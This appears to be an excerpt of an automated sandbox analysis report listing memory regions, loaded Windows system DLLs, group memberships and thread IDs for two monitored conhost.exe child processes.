cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2348 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2349 start_va = 0xb72cb50000 end_va = 0xb72cb6ffff entry_point = 0x0 region_type = private name = "private_0x000000b72cb50000" filename = "" Region: id = 2350 start_va = 0xb72cb70000 end_va = 0xb72cb83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b72cb70000" filename = "" Region: id = 2351 start_va = 0xb72cb90000 end_va = 0xb72cbcffff entry_point = 0x0 region_type = private name = "private_0x000000b72cb90000" filename = "" Region: id = 2352 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2353 start_va = 0x7ff6c3d00000 end_va = 0x7ff6c3d22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3d00000" filename = "" Region: id = 2354 start_va = 0x7ff6c3d23000 end_va = 0x7ff6c3d23fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3d23000" filename = "" Region: id = 2355 start_va = 0x7ff6c3d2e000 end_va = 0x7ff6c3d2ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3d2e000" filename = "" Region: id = 2356 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2357 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2358 start_va = 0xb72cc10000 end_va = 0xb72cd0ffff entry_point = 0x0 region_type = private name = "private_0x000000b72cc10000" filename = "" Region: id = 2359 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2360 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2822 start_va = 0xb72cb50000 end_va = 0xb72cb5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b72cb50000" filename = "" Region: id = 2823 start_va = 0xb72cb60000 end_va = 0xb72cb66fff entry_point = 0x0 region_type = private name = "private_0x000000b72cb60000" filename = "" Region: id = 2824 start_va = 0xb72cbd0000 end_va = 0xb72cc0ffff entry_point = 0x0 region_type = private name = "private_0x000000b72cbd0000" filename = "" Region: id = 2825 start_va = 0xb72cd10000 end_va = 0xb72cdcdfff entry_point = 0xb72cd10000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2826 start_va = 0xb72cdd0000 end_va = 0xb72cdd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b72cdd0000" filename = "" Region: id = 2827 start_va = 0xb72cde0000 end_va = 0xb72cde6fff entry_point = 0x0 region_type = private name = "private_0x000000b72cde0000" filename = "" Region: id = 2828 start_va = 0xb72cdf0000 end_va = 0xb72cdf0fff entry_point = 0x0 region_type = private name = "private_0x000000b72cdf0000" filename = "" Region: id = 2829 start_va = 0xb72ce00000 end_va = 0xb72ce00fff entry_point = 0x0 region_type = private name = "private_0x000000b72ce00000" filename = "" Region: id = 2830 start_va = 0xb72ce70000 end_va = 0xb72ce7ffff entry_point = 0x0 region_type = private name = "private_0x000000b72ce70000" filename = "" Region: id = 2831 start_va = 0xb72ce80000 end_va = 0xb72d007fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b72ce80000" filename = "" Region: id = 2832 start_va = 0xb72d010000 end_va = 0xb72d190fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b72d010000" filename = "" Region: id = 2833 start_va = 0xb72d1a0000 end_va = 0xb72e59ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b72d1a0000" filename = "" Region: id = 2834 start_va = 0x7ff6c3c00000 end_va = 0x7ff6c3cfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3c00000" filename = "" Region: id = 2835 start_va = 0x7ff6c3d2c000 end_va = 0x7ff6c3d2dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3d2c000" filename = "" Region: id = 2836 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2837 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2838 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2839 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2840 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2841 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2842 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2843 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2844 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2845 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2846 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2847 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4613 start_va = 0xb72ce10000 end_va = 0xb72ce4ffff entry_point = 0x0 region_type = private name = "private_0x000000b72ce10000" filename = "" Region: id = 4614 start_va = 0xb72e600000 end_va = 0xb72e60ffff entry_point = 0x0 region_type = private name = "private_0x000000b72e600000" filename = "" Region: id = 4615 start_va = 0xb72e6c0000 end_va = 0xb72e6cffff entry_point = 0x0 region_type = private name = "private_0x000000b72e6c0000" filename = "" Region: id = 4616 start_va = 0xb72e6d0000 end_va = 0xb72ea06fff entry_point = 0xb72e6d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4617 start_va = 0xb72ea10000 end_va = 0xb72ec2ffff entry_point = 0x0 region_type = private name = "private_0x000000b72ea10000" filename = "" Region: id = 4618 start_va = 0xb72ec30000 end_va = 0xb72ee46fff entry_point = 0x0 region_type = private name = "private_0x000000b72ec30000" filename = "" Region: id = 4619 start_va = 0xb72ee50000 end_va = 0xb72ef67fff entry_point = 0x0 region_type = private name = "private_0x000000b72ee50000" filename = "" Region: id = 4620 start_va = 0xb72ef70000 end_va = 0xb72f182fff entry_point = 0x0 region_type = private name = "private_0x000000b72ef70000" filename = "" Region: id = 4621 start_va = 0xb72f190000 end_va = 0xb72f29ffff entry_point = 0x0 region_type = private name = "private_0x000000b72f190000" filename = "" Region: id = 4622 start_va = 0x7ff6c3d2a000 end_va = 0x7ff6c3d2bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3d2a000" filename = "" Region: id = 4623 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4624 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4625 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4626 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4627 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4628 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4629 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4630 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4631 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 151 os_tid = 0xfa4 Thread: id = 196 os_tid = 0xc28 Thread: id = 218 os_tid = 0x106c Thread: id = 304 os_tid = 0x11f0 Process: id = "121" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xfdd9000" os_pid = "0xfa8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "78" os_parent_pid = "0xe44" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2361 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2362 start_va = 0x74271d0000 end_va = 0x74271effff entry_point = 0x0 region_type = private name = "private_0x00000074271d0000" filename = "" Region: id = 2363 start_va = 0x74271f0000 end_va = 0x7427203fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000074271f0000" filename = "" Region: id = 2364 start_va = 0x7427210000 end_va = 0x742724ffff entry_point = 0x0 region_type = private name = "private_0x0000007427210000" filename = "" Region: id = 2365 start_va = 0x7df5ffc00000 end_va = 0x7ff5ffbfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffc00000" filename = "" Region: id = 2366 start_va = 0x7ff6c4770000 end_va = 0x7ff6c4792fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4770000" filename = "" Region: id = 2367 start_va = 0x7ff6c479d000 end_va = 0x7ff6c479efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c479d000" filename = "" Region: id = 2368 start_va = 0x7ff6c479f000 end_va = 0x7ff6c479ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c479f000" filename = "" Region: id = 2369 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2370 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2371 start_va = 0x74272c0000 end_va = 0x74273bffff entry_point = 0x0 region_type = private name = "private_0x00000074272c0000" filename = "" Region: id = 2372 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2373 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2848 start_va = 0x74271d0000 end_va = 0x74271dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000074271d0000" filename = "" Region: id = 2849 start_va = 0x74271e0000 end_va = 0x74271e6fff entry_point = 0x0 region_type = private name = "private_0x00000074271e0000" filename = "" Region: id = 2850 start_va = 0x7427250000 end_va = 0x742728ffff entry_point = 0x0 region_type = private name = "private_0x0000007427250000" filename = "" Region: id = 2851 start_va = 0x7427290000 end_va = 0x7427290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007427290000" filename = "" Region: id = 2852 start_va = 0x74272a0000 end_va = 0x74272a6fff entry_point = 0x0 region_type = private name = "private_0x00000074272a0000" filename = "" Region: id = 2853 start_va = 0x74272b0000 end_va = 0x74272b0fff entry_point = 0x0 region_type = private name = "private_0x00000074272b0000" filename = "" Region: id = 2854 start_va = 0x74273c0000 end_va = 0x742747dfff entry_point = 0x74273c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2855 start_va = 0x7427480000 end_va = 0x7427480fff entry_point = 0x0 region_type = private name = "private_0x0000007427480000" filename = "" Region: id = 2856 start_va = 0x74274f0000 end_va = 0x74274fffff entry_point = 0x0 region_type = private name = "private_0x00000074274f0000" filename = "" Region: id = 2857 start_va = 0x7427500000 end_va = 0x7427687fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007427500000" filename = "" Region: id = 2858 start_va = 0x7427690000 end_va = 0x7427810fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007427690000" filename = "" Region: id = 2859 start_va = 0x7427820000 end_va = 0x7428c1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007427820000" filename = "" Region: id = 2860 start_va = 0x7ff6c4670000 end_va = 0x7ff6c476ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4670000" filename = "" Region: id = 2861 start_va = 0x7ff6c479b000 end_va = 0x7ff6c479cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c479b000" filename = "" Region: id = 2862 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2863 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2864 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2865 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2866 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2867 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2868 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2869 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2870 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2871 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2872 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2873 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4594 start_va = 0x7427490000 end_va = 0x74274cffff entry_point = 0x0 region_type = private name = "private_0x0000007427490000" filename = "" Region: id = 4595 start_va = 0x7428cc0000 end_va = 0x7428ccffff entry_point = 0x0 region_type = private name = "private_0x0000007428cc0000" filename = "" Region: id = 4596 start_va = 0x7428cd0000 end_va = 0x7428dddfff entry_point = 0x0 region_type = private name = "private_0x0000007428cd0000" filename = "" Region: id = 4597 start_va = 0x7428e40000 end_va = 0x7428e4ffff entry_point = 0x0 region_type = private name = "private_0x0000007428e40000" filename = "" Region: id = 4598 start_va = 0x7428e50000 end_va = 0x7429186fff entry_point = 0x7428e50000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4599 start_va = 0x7429190000 end_va = 0x74293affff entry_point = 0x0 region_type = private name = "private_0x0000007429190000" filename = "" Region: id = 4600 start_va = 0x74293b0000 end_va = 0x74295c8fff entry_point = 0x0 region_type = private name = "private_0x00000074293b0000" filename = "" Region: id = 4601 start_va = 0x74295d0000 end_va = 0x74297edfff entry_point = 0x0 region_type = private name = "private_0x00000074295d0000" filename = "" Region: id = 4602 start_va = 0x74297f0000 end_va = 0x74298fdfff entry_point = 0x0 region_type = private name = "private_0x00000074297f0000" filename = "" Region: id = 4603 start_va = 0x7ff6c4799000 end_va = 0x7ff6c479afff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4799000" filename = "" Region: id = 4604 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4605 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4606 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4607 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4608 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4609 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4610 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4611 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4612 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 152 os_tid = 0xfac Thread: id = 197 os_tid = 0x210 Thread: id = 219 os_tid = 0x1070 Thread: id = 303 os_tid = 0x11ec